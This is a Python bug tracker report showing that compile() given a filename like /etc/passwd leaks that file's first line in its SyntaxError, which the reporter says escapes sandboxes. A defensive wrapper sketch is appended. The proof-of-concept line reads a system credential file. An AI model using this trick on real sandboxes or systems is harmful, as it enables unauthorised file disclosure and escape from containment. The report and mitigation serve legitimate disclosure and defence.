New submission from Koh <kohyouli...@gmail.com>:
By specifying a filename in the compile function and then improperly terminating it, we are able to return the first line of any file.

>>> compile('yield', '/etc/passwd', 'exec')
  File "/etc/passwd", line 1
    root:x:0:0:root:/root:/bin/bash
    ^
SyntaxError: 'yield' outside function

Is this intended behavior? I have been able to use it to escape sandboxes.

----------
messages: 357906
nosy: iso
priority: normal
severity: normal
status: open
title: `compile` returns the first line of file on termination
type: security
versions: Python 2.7, Python 3.5, Python 3.6, Python 3.7, Python 3.8, Python 3.9

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue38985>
_______________________________________
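A defensive sketch for the behaviour reported above, added here as an example and not part of the original message or of CPython: a wrapper that never passes a caller-chosen `filename` to `compile` and rebuilds the error line from the submitted source only. The names `compile_untrusted`, `syntax_error_text` and `SAFE_FILENAME`, and the temporary file with its marker line, are assumptions constructed for the illustration.

```python
import os
import tempfile

# Assumed label, not a real path, so there is no file on disk to quote from.
SAFE_FILENAME = "<untrusted>"

def compile_untrusted(source, mode="exec"):
    """Compile caller-supplied source; the caller cannot choose `filename`."""
    try:
        return compile(source, SAFE_FILENAME, mode)
    except SyntaxError as err:
        # Take the offending line from the submitted source, never from disk.
        lines = source.splitlines()
        if err.lineno and 1 <= err.lineno <= len(lines):
            err.text = lines[err.lineno - 1]
        else:
            err.text = None
        raise

def syntax_error_text(source, filename):
    """Return SyntaxError.text for `source` compiled under `filename`, or None."""
    try:
        compile(source, filename, "exec")
    except SyntaxError as err:
        return err.text
    return None

def demo():
    marker = "CONSTRUCTED-SECRET-LINE"  # constructed sample data
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(marker + "\nsecond line\n")
        path = fh.name
    try:
        direct = syntax_error_text("yield", path)  # caller-controlled filename
        try:
            compile_untrusted("yield")
            wrapped = None
        except SyntaxError as err:
            wrapped = err.text  # fixed synthetic filename
    finally:
        os.unlink(path)
    return marker, direct, wrapped

if __name__ == "__main__":
    marker, direct, wrapped = demo()
    print("caller-controlled filename ->", repr(direct))
    print("fixed synthetic filename   ->", repr(wrapped))
```

A sandbox that forwards error messages to the submitter should also check that no other code path (for example traceback formatting) accepts a filename from the caller.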